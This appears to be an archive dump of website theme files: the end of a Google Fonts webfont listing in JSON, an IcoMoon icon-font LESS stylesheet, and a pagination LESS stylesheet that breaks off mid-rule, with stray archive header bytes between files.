        "800",
        "900",
        "100italic",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v8",
      "lastModified": "2020-06-26",
      "files": {
        "100": "http://fonts.gstatic.com/s/worksans/v8/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K0nWNigDp6_cOyA.ttf",
        "200": "http://fonts.gstatic.com/s/worksans/v8/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K8nXNigDp6_cOyA.ttf",
        "300": "http://fonts.gstatic.com/s/worksans/v8/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32KxfXNigDp6_cOyA.ttf",
        "regular": "http://fonts.gstatic.com/s/worksans/v8/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K0nXNigDp6_cOyA.ttf",
        "500": "http://fonts.gstatic.com/s/worksans/v8/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K3vXNigDp6_cOyA.ttf",
        "600": "http://fonts.gstatic.com/s/worksans/v8/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K5fQNigDp6_cOyA.ttf",
        "700": "http://fonts.gstatic.com/s/worksans/v8/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K67QNigDp6_cOyA.ttf",
        "800": "http://fonts.gstatic.com/s/worksans/v8/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K8nQNigDp6_cOyA.ttf",
        "900": "http://fonts.gstatic.com/s/worksans/v8/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K-DQNigDp6_cOyA.ttf",
        "100italic": "http://fonts.gstatic.com/s/worksans/v8/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGU3moJo43ZKyDSQQ.ttf",
        "200italic": "http://fonts.gstatic.com/s/worksans/v8/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUXmsJo43ZKyDSQQ.ttf",
        "300italic": "http://fonts.gstatic.com/s/worksans/v8/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUgGsJo43ZKyDSQQ.ttf",
        "italic": "http://fonts.gstatic.com/s/worksans/v8/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGU3msJo43ZKyDSQQ.ttf",
        "500italic": "http://fonts.gstatic.com/s/worksans/v8/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGU7GsJo43ZKyDSQQ.ttf",
        "600italic": "http://fonts.gstatic.com/s/worksans/v8/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUAGwJo43ZKyDSQQ.ttf",
        "700italic": "http://fonts.gstatic.com/s/worksans/v8/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUOWwJo43ZKyDSQQ.ttf",
        "800italic": "http://fonts.gstatic.com/s/worksans/v8/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUXmwJo43ZKyDSQQ.ttf",
        "900italic": "http://fonts.gstatic.com/s/worksans/v8/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUd2wJo43ZKyDSQQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Xanh Mono",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-11-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/xanhmono/v1/R70YjykVmvKCep-vWhSYmACQXzLhTg.ttf",
        "italic": "http://fonts.gstatic.com/s/xanhmono/v1/R70ejykVmvKCep-vWhSomgqUfTfxTo24.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Yanone Kaffeesatz",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v15",
      "lastModified": "2020-06-26",
      "files": {
        "200": "http://fonts.gstatic.com/s/yanonekaffeesatz/v15/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftodtWpcGuLCnXkVA.ttf",
        "300": "http://fonts.gstatic.com/s/yanonekaffeesatz/v15/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftoqNWpcGuLCnXkVA.ttf",
        "regular": "http://fonts.gstatic.com/s/yanonekaffeesatz/v15/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIfto9tWpcGuLCnXkVA.ttf",
        "500": "http://fonts.gstatic.com/s/yanonekaffeesatz/v15/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftoxNWpcGuLCnXkVA.ttf",
        "600": "http://fonts.gstatic.com/s/yanonekaffeesatz/v15/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftoKNKpcGuLCnXkVA.ttf",
        "700": "http://fonts.gstatic.com/s/yanonekaffeesatz/v15/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftoEdKpcGuLCnXkVA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Yantramanav",
      "variants": [
        "100",
        "300",
        "regular",
        "500",
        "700",
        "900"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/yantramanav/v6/flU-Rqu5zY00QEpyWJYWN5-QXeNzDB41rZg.ttf",
        "300": "http://fonts.gstatic.com/s/yantramanav/v6/flUhRqu5zY00QEpyWJYWN59Yf8NZIhI8tIHh.ttf",
        "regular": "http://fonts.gstatic.com/s/yantramanav/v6/flU8Rqu5zY00QEpyWJYWN6f0V-dRCQ41.ttf",
        "500": "http://fonts.gstatic.com/s/yantramanav/v6/flUhRqu5zY00QEpyWJYWN58AfsNZIhI8tIHh.ttf",
        "700": "http://fonts.gstatic.com/s/yantramanav/v6/flUhRqu5zY00QEpyWJYWN59IeMNZIhI8tIHh.ttf",
        "900": "http://fonts.gstatic.com/s/yantramanav/v6/flUhRqu5zY00QEpyWJYWN59wesNZIhI8tIHh.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Yatra One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/yatraone/v7/C8ch4copsHzj8p7NaF0xw1OBbRDvXw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Yellowtail",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/yellowtail/v11/OZpGg_pnoDtINPfRIlLotlzNwED-b4g.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Yeon Sung",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/yeonsung/v8/QldMNTpbohAGtsJvUn6xSVNazqx2xg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Yeseva One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v15",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/yesevaone/v15/OpNJno4ck8vc-xYpwWWxpipfWhXD00c.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Yesteryear",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/yesteryear/v9/dg4g_p78rroaKl8kRKo1r7wHTwonmyw.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Yrsa",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/yrsa/v6/wlpxgwnQFlxs3af93IQ73W5OcCk.ttf",
        "regular": "http://fonts.gstatic.com/s/yrsa/v6/wlp-gwnQFlxs5QvV-IwQwWc.ttf",
        "500": "http://fonts.gstatic.com/s/yrsa/v6/wlpxgwnQFlxs3f_83IQ73W5OcCk.ttf",
        "600": "http://fonts.gstatic.com/s/yrsa/v6/wlpxgwnQFlxs3dP73IQ73W5OcCk.ttf",
        "700": "http://fonts.gstatic.com/s/yrsa/v6/wlpxgwnQFlxs3bf63IQ73W5OcCk.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "ZCOOL KuaiLe",
      "variants": [
        "regular"
      ],
      "subsets": [
        "chinese-simplified",
        "latin"
      ],
      "version": "v5",
      "lastModified": "2019-11-05",
      "files": {
        "regular": "http://fonts.gstatic.com/s/zcoolkuaile/v5/tssqApdaRQokwFjFJjvM6h2WpozzoXhC2g.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "ZCOOL QingKe HuangYou",
      "variants": [
        "regular"
      ],
      "subsets": [
        "chinese-simplified",
        "latin"
      ],
      "version": "v5",
      "lastModified": "2019-11-05",
      "files": {
        "regular": "http://fonts.gstatic.com/s/zcoolqingkehuangyou/v5/2Eb5L_R5IXJEWhD3AOhSvFC554MOOahI4mRIi_28c8bHWA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "ZCOOL XiaoWei",
      "variants": [
        "regular"
      ],
      "subsets": [
        "chinese-simplified",
        "latin"
      ],
      "version": "v5",
      "lastModified": "2019-11-05",
      "files": {
        "regular": "http://fonts.gstatic.com/s/zcoolxiaowei/v5/i7dMIFFrTRywPpUVX9_RJyM1YFKQHwyVd3U.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Zeyada",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/zeyada/v10/11hAGpPTxVPUbgZDNGatWKaZ3g.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Zhi Mang Xing",
      "variants": [
        "regular"
      ],
      "subsets": [
        "chinese-simplified",
        "latin"
      ],
      "version": "v5",
      "lastModified": "2019-11-05",
      "files": {
        "regular": "http://fonts.gstatic.com/s/zhimangxing/v5/f0Xw0ey79sErYFtWQ9a2rq-g0actfektIJ0.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Zilla Slab",
      "variants": [
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/zillaslab/v6/dFa5ZfeM_74wlPZtksIFYpEY2HSjWlhzbaw.ttf",
        "300italic": "http://fonts.gstatic.com/s/zillaslab/v6/dFanZfeM_74wlPZtksIFaj8CVHapXnp2fazkfg.ttf",
        "regular": "http://fonts.gstatic.com/s/zillaslab/v6/dFa6ZfeM_74wlPZtksIFWj0w_HyIRlE.ttf",
        "italic": "http://fonts.gstatic.com/s/zillaslab/v6/dFa4ZfeM_74wlPZtksIFaj86-F6NVlFqdA.ttf",
        "500": "http://fonts.gstatic.com/s/zillaslab/v6/dFa5ZfeM_74wlPZtksIFYskZ2HSjWlhzbaw.ttf",
        "500italic": "http://fonts.gstatic.com/s/zillaslab/v6/dFanZfeM_74wlPZtksIFaj8CDHepXnp2fazkfg.ttf",
        "600": "http://fonts.gstatic.com/s/zillaslab/v6/dFa5ZfeM_74wlPZtksIFYuUe2HSjWlhzbaw.ttf",
        "600italic": "http://fonts.gstatic.com/s/zillaslab/v6/dFanZfeM_74wlPZtksIFaj8CIHCpXnp2fazkfg.ttf",
        "700": "http://fonts.gstatic.com/s/zillaslab/v6/dFa5ZfeM_74wlPZtksIFYoEf2HSjWlhzbaw.ttf",
        "700italic": "http://fonts.gstatic.com/s/zillaslab/v6/dFanZfeM_74wlPZtksIFaj8CRHGpXnp2fazkfg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Zilla Slab Highlight",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/zillaslabhighlight/v8/gNMbW2BrTpK8-inLtBJgMMfbm6uNVDvRxhtIY2DwSXlM.ttf",
        "700": "http://fonts.gstatic.com/s/zillaslabhighlight/v8/gNMUW2BrTpK8-inLtBJgMMfbm6uNVDvRxiP0TET4YmVF0Mb6.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    }
  ]
}
PK!�a��$0$0flex/less/icomoon.lessnu&1i�@font-face {
	font-family: 'IcoMoon';
	src: url('../fonts/IcoMoon.eot');
	src: url('../fonts/IcoMoon.eot?#iefix') format('embedded-opentype'),
		url('../fonts/IcoMoon.woff') format('woff'),
		url('../fonts/IcoMoon.ttf') format('truetype'),
		url('../fonts/IcoMoon.svg#IcoMoon') format('svg');
	font-weight: normal;
	font-style: normal;
}

/* Use the following CSS code if you want to use data attributes for inserting your icons */
[data-icon]:before {
	font-family: 'IcoMoon';
	content: attr(data-icon);
	speak: none;
}

/* From Bootstrap */
[class^="icon-"],
[class*=" icon-"] {
	display: inline-block;
	width: 14px;
	height: 14px;
	margin-right: .25em;
	line-height: 14px;
	background-image: none;
}

dd > span[class^="icon-"] + time,
dd > span[class*=" icon-"] + time{
	margin-left: -.25em;
}
dl.article-info dd.hits span[class^="icon-"],
dl.article-info dd.hits span[class*=" icon-"]{
	margin-right: 0;
 }
 
/* Use the following CSS code if you want to have a class per icon */
[class^="icon-"]:before, [class*=" icon-"]:before {
	font-family: 'IcoMoon';
	font-style: normal;
	speak: none;
}
[class^="icon-"].disabled,
[class*=" icon-"].disabled {
	font-weight: normal;
}

.icon-joomla:before {
	content: "\e200";
}
.icon-chevron-up:before,
.icon-uparrow:before,
.icon-arrow-up:before {
	content: "\e005";
}
.icon-chevron-right:before,
.icon-rightarrow:before,
.icon-arrow-right:before{
	content: "\e006";
}
.icon-chevron-down:before,
.icon-downarrow:before,
.icon-arrow-down:before {
	content: "\e007";
}
.icon-chevron-left:before,
.icon-leftarrow:before,
.icon-arrow-left:before {
	content: "\e008";
}
.icon-arrow-first:before {
	content: "\e003";
}
.icon-arrow-last:before {
	content: "\e004";
}
.icon-arrow-up-2:before {
	content: "\e009";
}
.icon-arrow-right-2:before {
	content: "\e00a";
}
.icon-arrow-down-2:before {
	content: "\e00b";
}
.icon-arrow-left-2:before {
	content: "\e00c";
}
.icon-arrow-up-3:before {
	content: "\e00f";
}
.icon-arrow-right-3:before {
	content: "\e010";
}
.icon-arrow-down-3:before {
	content: "\e011";
}
.icon-arrow-left-3:before {
	content: "\e012";
}
.icon-menu-2:before {
	content: "\e00e";
}
.icon-arrow-up-4:before {
	content: "\e201";
}
.icon-arrow-right-4:before {
	content: "\e202";
}
.icon-arrow-down-4:before {
	content: "\e203";
}
.icon-arrow-left-4:before {
	content: "\e204";
}
.icon-share:before,
.icon-redo:before {
	content: "\27";
}
.icon-undo:before {
	content: "\28";
}
.icon-forward-2:before {
	content: "\e205";
}
.icon-backward-2:before,
.icon-reply:before {
	content: "\e206";
}
.icon-unblock:before,
.icon-refresh:before,
.icon-redo-2:before {
	content: "\6c";
}
.icon-undo-2:before {
	content: "\e207";
}
.icon-move:before {
	content: "\7a";
}
.icon-expand:before {
	content: "\66";
}
.icon-contract:before {
	content: "\67";
}
.icon-expand-2:before {
	content: "\68";
}
.icon-contract-2:before {
	content: "\69";
}
.icon-play:before {
	content: "\e208";
}
.icon-pause:before {
	content: "\e209";
}
.icon-stop:before {
	content: "\e210";
}
.icon-previous:before,
.icon-backward:before {
	content: "\7c";
}
.icon-next:before,
.icon-forward:before {
	content: "\7b";
}
.icon-first:before {
	content: "\7d";
}
.icon-last:before {
	content: "\e000";
}
.icon-play-circle:before {
	content: "\e00d";
}
.icon-pause-circle:before {
	content: "\e211";
}
.icon-stop-circle:before {
	content: "\e212";
}
.icon-backward-circle:before {
	content: "\e213";
}
.icon-forward-circle:before {
	content: "\e214";
}
.icon-loop:before {
	content: "\e001";
}
.icon-shuffle:before {
	content: "\e002";
}
.icon-search:before {
	content: "\53";
}
.icon-zoom-in:before {
	content: "\64";
}
.icon-zoom-out:before {
	content: "\65";
}
.icon-apply:before,
.icon-edit:before,
.icon-pencil:before {
	content: "\2b";
}
.icon-pencil-2:before {
	content: "\2c";
}
.icon-brush:before {
	content: "\3b";
}
.icon-save-new:before,
.icon-plus-2:before  {
	content: "\5d";
}
.icon-ban-circle:before,
.icon-minus-sign:before,
.icon-minus-2:before {
	content: "\5e";
}
.icon-delete:before,
.icon-remove:before,
.icon-cancel-2:before {
	content: "\49";
}
.icon-publish:before,
.icon-save:before,
.icon-ok:before,
.icon-checkmark:before {
	content: "\47";
}
.icon-new:before,
.icon-plus:before {
	content: "\2a";
}
.icon-plus-circle:before {
	content: "\e215";
}
.icon-minus:before,
.icon-not-ok:before {
	content: "\4b";
}
.icon-minus-circle:before {
	content: "\e216";
}
.icon-unpublish:before,
.icon-cancel:before {
	content: "\4a";
}
.icon-cancel-circle:before {
	content: "\e217";
}
.icon-checkmark-2:before {
	content: "\e218";
}
.icon-checkmark-circle:before {
	content: "\e219";
}
.icon-info:before {
	content: "\e220";
}
.icon-info-2:before,
.icon-info-circle:before {
	content: "\e221";
}
.icon-question:before,
.icon-question-sign:before,
.icon-help:before {
	content: "\45";
}
.icon-question-2:before,
.icon-question-circle:before {
	content: "\e222";
}
.icon-notification:before {
	content: "\e223";
}
.icon-notification-2:before,
.icon-notification-circle:before {
	content: "\e224";
}
.icon-pending:before,
.icon-warning:before {
	content: "\48";
}
.icon-warning-2:before,
.icon-warning-circle:before {
	content: "\e225";
}
.icon-checkbox-unchecked:before {
	content: "\3d";
}
.icon-checkin:before,
.icon-checkbox:before,
.icon-checkbox-checked:before {
	content: "\3e";
}
.icon-checkbox-partial:before {
	content: "\3f";
}
.icon-square:before {
	content: "\e226";
}
.icon-radio-unchecked:before {
	content: "\e227";
}
.icon-radio-checked:before,
.icon-generic:before {
	content: "\e228";
}
.icon-circle:before {
	content: "\e229";
}
.icon-signup:before {
	content: "\e230";
}
.icon-grid:before,
.icon-grid-view:before {
	content: "\58";
}
.icon-grid-2:before,
.icon-grid-view-2:before {
	content: "\59";
}
.icon-menu:before {
	content: "\5a";
}
.icon-list:before,
.icon-list-view:before {
	content: "\31";
}
.icon-list-2:before {
	content: "\e231";
}
.icon-menu-3:before {
	content: "\e232";
}
.icon-folder-open:before,
.icon-folder:before {
	content: "\2d";
}
.icon-folder-close:before,
.icon-folder-2:before {
	content: "\2e";
}
.icon-folder-plus:before {
	content: "\e234";
}
.icon-folder-minus:before {
	content: "\e235";
}
.icon-folder-3:before {
	content: "\e236";
}
.icon-folder-plus-2:before {
	content: "\e237";
}
.icon-folder-remove:before {
	content: "\e238";
}
.icon-file:before {
	content: "\e016";
}
.icon-file-2:before {
	content: "\e239";
}
.icon-file-add:before,
.icon-file-plus:before {
	content: "\29";
}
.icon-file-remove:before,
.icon-file-minus:before {
	content: "\e017";
}
.icon-file-check:before {
	content: "\e240";
}
.icon-file-remove:before {
	content: "\e241";
}
.icon-save-copy:before,
.icon-copy:before {
	content: "\e018";
}
.icon-stack:before {
	content: "\e242";
}
.icon-tree:before {
	content: "\e243";
}
.icon-tree-2:before {
	content: "\e244";
}
.icon-paragraph-left:before {
	content: "\e246";
}
.icon-paragraph-center:before {
	content: "\e247";
}
.icon-paragraph-right:before {
	content: "\e248";
}
.icon-paragraph-justify:before {
	content: "\e249";
}
.icon-screen:before {
	content: "\e01c";
}
.icon-tablet:before {
	content: "\e01d";
}
.icon-mobile:before {
	content: "\e01e";
}
.icon-box-add:before {
	content: "\51";
}
.icon-box-remove:before {
	content: "\52";
}
.icon-download:before {
	content: "\e021";
}
.icon-upload:before {
	content: "\e022";
}
.icon-home:before {
	content: "\21";
}
.icon-home-2:before {
	content: "\e250";
}
.icon-out-2:before,
.icon-new-tab:before {
	content: "\e024";
}
.icon-out-3:before,
.icon-new-tab-2:before {
	content: "\e251";
}
.icon-link:before {
	content: "\e252";
}
.icon-picture:before,
.icon-image:before {
	content: "\2f";
}
.icon-pictures:before,
.icon-images:before {
	content: "\30";
}
.icon-palette:before,
.icon-color-palette:before {
	content: "\e014";
}
.icon-camera:before {
	content: "\55";
}
.icon-camera-2:before,
.icon-video:before {
	content: "\e015";
}
.icon-play-2:before,
.icon-video-2:before,
.icon-youtube:before {
	content: "\56";
}
.icon-music:before {
	content: "\57";
}
.icon-user:before {
	content: "\22";
}
.icon-users:before {
	content: "\e01f";
}
.icon-vcard:before {
	content: "\6d";
}
.icon-address:before {
	content: "\70";
}
.icon-share-alt:before,
.icon-out:before {
	content: "\26";
}
.icon-enter:before {
	content: "\e257";
}
.icon-exit:before {
	content: "\e258";
}
.icon-comment:before,
.icon-comments:before {
	content: "\24";
}
.icon-comments-2:before {
	content: "\25";
}
.icon-quote:before,
.icon-quotes-left:before {
	content: "\60";
}
.icon-quote-2:before,
.icon-quotes-right:before {
	content: "\61";
}
.icon-quote-3:before,
.icon-bubble-quote:before {
	content: "\e259";
}
.icon-phone:before {
	content: "\e260";
}
.icon-phone-2:before {
	content: "\e261";
}
.icon-envelope:before,
.icon-mail:before {
	content: "\4d";
}
.icon-envelope-opened:before,
.icon-mail-2:before {
	content: "\4e";
}
.icon-unarchive:before,
.icon-drawer:before {
	content: "\4f";
}
.icon-archive:before,
.icon-drawer-2:before {
	content: "\50";
}
.icon-briefcase:before {
	content: "\e020";
}
.icon-tag:before {
	content: "\e262";
}
.icon-tag-2:before {
	content: "\e263";
}
.icon-tags:before {
	content: "\e264";
}
.icon-tags-2:before {
	content: "\e265";
}
.icon-options:before,
.icon-cog:before {
	content: "\38";
}
.icon-cogs:before {
	content: "\37";
}
.icon-screwdriver:before,
.icon-tools:before {
	content: "\36";
}
.icon-wrench:before {
	content: "\3a";
}
.icon-equalizer:before {
	content: "\39";
}
.icon-dashboard:before {
	content: "\78";
}
.icon-switch:before {
	content: "\e266";
}
.icon-filter:before {
	content: "\54";
}
.icon-purge:before,
.icon-trash:before {
	content: "\4c";
}
.icon-checkedout:before,
.icon-lock:before,
.icon-locked:before {
	content: "\23";
}
.icon-unlock:before {
	content: "\e267";
}
.icon-key:before {
	content: "\5f";
}
.icon-support:before {
	content: "\46";
}
.icon-database:before {
	content: "\62";
}
.icon-scissors:before {
	content: "\e268";
}
.icon-health:before {
	content: "\6a";
}
.icon-wand:before {
	content: "\6b";
}
.icon-eye-open:before,
.icon-eye:before {
	content: "\3c";
}
.icon-eye-close:before,
.icon-eye-blocked:before,
.icon-eye-2:before {
	content: "\e269";
}
.icon-clock:before {
	content: "\6e";
}
.icon-compass:before {
	content: "\6f";
}
.icon-broadcast:before,
.icon-connection:before,
.icon-wifi:before {
	content: "\e01b";
}
.icon-book:before {
	content: "\e271";
}
.icon-lightning:before,
.icon-flash:before {
	content: "\79";
}
.icon-print:before,
.icon-printer:before {
	content: "\e013";
}
.icon-feed:before {
	content: "\71";
}
.icon-calendar:before {
	content: "\43";
}
.icon-calendar-2:before {
	content: "\44";
}
.icon-calendar-3:before {
	content: "\e273";
}
.icon-pie:before {
	content: "\77";
}
.icon-bars:before {
	content: "\76";
}
.icon-chart:before {
	content: "\75";
}
.icon-power-cord:before {
	content: "\32";
}
.icon-cube:before {
	content: "\33";
}
.icon-puzzle:before {
	content: "\34";
}
.icon-attachment:before,
.icon-paperclip:before,
.icon-flag-2:before {
	content: "\72";
}
.icon-lamp:before {
	content: "\74";
}
.icon-pin:before,
.icon-pushpin:before {
	content: "\73";
}
.icon-location:before {
	content: "\63";
}
.icon-shield:before {
	content: "\e274";
}
.icon-flag:before {
	content: "\35";
}
.icon-flag-3:before {
	content: "\e275";
}
.icon-bookmark:before {
	content: "\e023";
}
.icon-bookmark-2:before {
	content: "\e276";
}
.icon-heart:before {
	content: "\e277";
}
.icon-heart-2:before {
	content: "\e278";
}
.icon-thumbs-up:before {
	content: "\5b";
}
.icon-thumbs-down:before{
	content: "\5c";
}
.icon-unfeatured:before,
.icon-asterisk:before,
.icon-star-empty:before {
	content: "\40";
}
.icon-star-2:before {
	content: "\41";
}
.icon-featured:before,
.icon-default:before,
.icon-star:before{
	content: "\42";
}
.icon-smiley:before,
.icon-smiley-happy:before {
	content: "\e279";
}
.icon-smiley-2:before,
.icon-smiley-happy-2:before {
	content: "\e280";
}
.icon-smiley-sad:before {
	content: "\e281";
}
.icon-smiley-sad-2:before {
	content: "\e282";
}
.icon-smiley-neutral:before {
	content: "\e283";
}
.icon-smiley-neutral-2:before {
	content: "\e284";
}
.icon-cart:before {
	content: "\e019";
}
.icon-basket:before {
	content: "\e01a";
}
.icon-credit:before {
	content: "\e286";
}
.icon-credit-2:before {
	content: "\e287";
}
.icon-expired:before {
content: "\4b";
}
PK!�Mc�&&flex/less/pagination.lessnu&1i�
.pagination-wrapper {
	display:block;
	margin:1em auto;
	text-align:center;
}
.pagination {
	margin:0 auto;
	text-align:center;
	display:table;
}
nav[role="pagination"] {
  text-align: center;
}

.cd-pagination {
	width: 90%;
	padding:0;
	margin:1em auto;
	text-align: center;
  	li {
		display: inline-block;
		margin: 0;
		&.active {
			pointer-events: none;
		}
		.button {
			display: inline-block;
		}
	}
	a, span {
	  display: inline-block;
	  -webkit-user-select: none;
	  -moz-user-select: none;
	  -ms-user-select: none;
	  user-select: none;
	  padding: .4em .8em;
	  font-size: 100%;
	}

	a {
	  border: 1px solid #e6e6e6;
	  border-radius: 0.25em;
	
		  i {
				font-style:normal;
				line-height:49px;
			}
		  [class^="ap-"] {
				font-style:normal;
				line-height:26px;
				font-size:90%;
			}
		.disabled {
		  /* button disabled */
		  color: rgba(46, 64, 87, 0.4);
		  pointer-events: none;
		  
				&:before,
				&:after {
				   opacity:0.4;
				}
		}
	}
}

/* -------------------------------- 
No space - remove distance between list items
-------------------------------- */
.cd-pagination.no-space {
  width: auto;
  max-width: none;
  display: inline-block;
  border-radius: 0.25em;
  border: 1px solid #e6e6e6;
  
	a, span {
	  float: left;
	  border-radius: 0;
	  padding: .8em 1em;
	  border: none;
	}

 	 &:after {
		  content: "";
		  display: table;
		  clear: both;
	 }
	li {
	  margin: 0;
	  float: left;
	  border-right: 1px solid #e6e6e6;
	  
		&:first-of-type {
			a {
			  border-radius: 0.25em 0 0 0.25em;
			}
		}
			
	  &:last-of-type {
		  border-right: none;
		  	a {
			  border-radius: 0 0.25em 0.25em 0;
			}
		}
	}
	
	.move-buttons {
	  width: 90%;
	  max-width: 768px;
	  display: block;
	  overflow: hidden;
	  
		li {
		  float: none;
		  border: none;
		}
		
		a, span {
		  float: none;
		}
			
	}

}


/* -------------------------------- 
custom icons - customize the small arrow inside the next and prev buttons 
-------------------------------- */
.cd-pagination.custom-icons {
	.button a {
	  position: relative;
	}
	
	a.next,
	a.previous {
		i {
			font-family: 'ap-arrows';
		}
	}

	.btn-previous {
		a {
	  		padding-left: 2.4em;
			
			&:before {
				content: "\e606";
				font-family: 'ap-arrows';
				font-size:20px;
				position: absolute;
				display: inline-block;
				line-height: 24px;
				top: 50%;
				margin-top:-12px;
			}
		}
	}
	.btn-next {
		a {
	  		padding-right: 2.4em;
		}
			&:last-of-type {		
				a {
					&:after {
						content: "\e607";
						font-family: 'ap-arrows';
						font-size:20px;
						position: absolute;
						display: inline-block;
						line-height: 24px;
						top: 50%;
						margin-top:-12px;
					}
				
				}
			}
	}

	.button:first-of-type a::before {
	  left: .8em;
	}
	.button.next:last-of-type a::after {
	  right: .8em;
	
	}

}

/* -------------------------------- 
custom buttons - replace prev and next buttons text with a custom icon 
-------------------------------- */
.cd-pagination.custom-buttons a, .cd-pagination.custom-buttons span {
  vertical-align: middle;
}
.cd-pagination.no-space.custom-buttons .button:last-of-type a {
  border-radius: 0.25em 0 0 0.25em;
}

/* -------------------------------- 
animated buttons - animate the text inside prev and next buttons 
-------------------------------- */
.cd-pagination.animated-buttons {
	
	a, span {
	  padding: 0 1.4em;
	  height: 50px;
	  line-height: 50px;
	  overflow: hidden;
	}
	
	.button {
		
		a {
		  position: relative;
		  padding: 0 2em;
		  
		  	i {
				display: block;
				height: 100%;
				-webkit-transform: translateY(100%);
				-moz-transform: translateY(100%);
				-ms-transform: translateY(100%);
				-o-transform: translateY(100%);
				transform: translateY(100%);
				-webkit-transition: -webkit-transform 0.3s;
				-moz-transition: -moz-transform 0.3s;
				transition: transform 0.3s;
			}
			
			&:hover {
				i {
				  -webkit-transform: translateY(0);
				  -moz-transform: translateY(0);
				  -ms-transform: translateY(0);
				  -o-transform: translateY(0);
				  transform: translateY(0);
				}
			}
		}
		
		&:first-of-type,
		&:last-of-type {	
			a {
				&:before,
				&:after {
					left: 50%;
					-webkit-transform: translateX(-50%);
